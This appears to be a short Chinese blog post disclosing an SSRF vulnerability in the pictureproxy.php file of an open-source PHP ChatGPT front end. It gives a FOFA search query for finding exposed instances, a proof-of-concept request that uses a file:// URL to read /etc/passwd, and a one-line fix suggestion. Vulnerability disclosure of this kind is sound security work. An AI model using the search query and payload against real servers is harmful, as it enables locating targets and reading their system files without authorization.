chatgpt个人版ssrf漏洞

扣脚大汉在网络2024-09-17 18:32

文章目录

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

fofa

复制代码 
title="ChatGPT个人专用版"

漏洞描述

该系统是一个开源的chatgpt系统,是PHP版调用OpenAI的API接口进行问答的模型,在prictureproxy.php文件处存在ssrf漏洞

漏洞复现

payload

yaml 复制代码 
GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1
Host: x.x.x.x

修复建议

修改源代码,进行黑白名单

相关推荐
菩提小狗18 小时前
每日安全情报报告 · 2026-05-30
网络安全·漏洞·cve·安全情报·每日安全
草明3 天前
检查 node.js 项目中的漏洞
node.js·漏洞·audit
bjzhang7525 天前
Linux曝出“核弹级”漏洞CVE-2026-31431:攻击者可瞬间提权
linux·漏洞·提权·cve-2026-31431
菩提小狗25 天前
每日安全情报报告 · 2026-05-02
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗1 个月前
每日安全情报报告 · 2026-05-05
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗1 个月前
每日安全情报报告 · 2026-05-03
网络安全·漏洞·cve·安全情报·每日安全
ybdesire1 个月前
间接提示词注入真实样例鉴赏
网络安全·语言模型·漏洞·漏洞分析
菩提小狗1 个月前
每日安全情报报告 · 2026-05-01
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗1 个月前
每日安全情报报告 · 2026-04-30
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗1 个月前
每日安全情报报告 · 2026-04-27
网络安全·漏洞·cve·安全情报·每日安全
热门推荐
01GitHub 镜像站点02【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法03【AI】2026 年具身智能模型和世界模型总结04DeepSeek V4 + Claude Code thinking mode 400 错误修复方案05Codex 接入 DeepSeek API 完整配置文档06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07CC-Switch & Claude 基于 Linux 服务器安装使用指南08几个好用的ip纯净度检测网站09CC-Switch 全平台下载、安装与使用全指南(Windows/macOS/Linux)10API Key 登录 Codex 也能用插件了,还支持会话删除和导出